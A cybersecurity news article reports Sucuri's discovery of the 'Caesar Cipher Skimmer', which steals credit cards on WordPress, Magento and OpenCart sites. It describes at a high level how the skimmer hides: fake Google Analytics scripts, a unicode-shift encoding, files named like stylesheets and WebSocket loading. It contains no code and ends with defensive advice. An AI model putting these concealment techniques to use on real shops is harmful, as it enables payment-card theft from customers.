Skip to content

Credit card web skimmers target WordPress, Magento, OpenCart

  • by
  • 3 min read

Sucuri researchers recently discovered a new credit card web skimmer that targeted e-commerce sites built on Content Management System (CMS) platforms.

The web skimmer, a malware inserted into e-sites to steal financial and payment information, was dubbed “Caesar Cipher Skimmer” by Sucuri. They found the skimmer on multiple CMS platforms like WordPress, Magento and OpenCart.

The recent campaign required malicious modifications to the checkout PHP page, “form-checkout.php,” of the WooCommerce plugin for WordPress to steal customers’ credit card details.

Security researcher Ben Martin said the injections have been changed in the past few months to appear less suspicious by posing as Google Analytics and Google Tag Manager. The scripts used for the attack used the same substitution mechanism to encode a part of the malware into a string and hide the external domain used to host the payload.

“What the malware does to hide its payload is to subtract the value of each unicode character by three. So it’s essentially using a Caesar Cipher on the unicode values, rather than simply just letters,” said Sucuri. It is likely that all the websites were previously compromised to stage the PHP script.

The scripts’ names, “style.css” and “css.php,” seem to attempt to mimic an HTML style sheet and avoid detection. The scripts are designed to load another layer of obfuscated skimmer JavaScript that creates a WebSocket, connects to a remote server, and waits for another server to run another layer of the skimmer.

The researchers said, “The script sends the URL of the current webpages, which allows the attackers to send customized responses for each infected site.” A few versions of the second script check if a logged-in WordPress user loaded it and modify the response accordingly.

The form-checkout.php file of WooCommerce is not the only file that had been used to inject the skimmer as threat actors have been observed misusing the WPCode plugin to insert it into the website database.

Javascript injections are carried out on Magento-based sites on database tables such as core_config_data. It is not yet clear how injection is accomplished on OpenCart sites.

WordPress, a CMS platform widely used as a foundation for websites, has become a target for cybercriminals granting effortless access to a wide attack surface. It has become essential for site owners to keep their CMS and plugins up-to-date, practice password hygiene and audit them regularly to track suspicious administrator accounts.

In the News: 278 GB of critical BSNL telecom data exposed on dark web

Arun Maity

Arun Maity

Arun Maity is a journalist from Kolkata who graduated from the Asian College of Journalism. He has an avid interest in music, videogames and anime. When he's not working, you can find him practicing and recording his drum covers, watching anime or playing games. You can contact him here: arunmaity23@proton.me

Related Reads

This is an image of cyber security hacked breach

Case study reveals Chinese hackers spent over 300 days in US electricity grid

This is an image of iphone with apple logo

Match Group, AIDF denied Apple’s confidential antitrust data

Photo: ascannio / shutterstock. Com

X’s outage can’t be traced by researchers and Musk alike

This is an image of malware featured security

DPRK’s KoSpy spyware targets SK, India, Russia, and Middle East

This is an image of honey featured 1

Google updates Chrome Extension policy after Honey scam

This is an image of apple featured 220923

Apple patches critical zero-day exploit targeting iPhones and iPads

>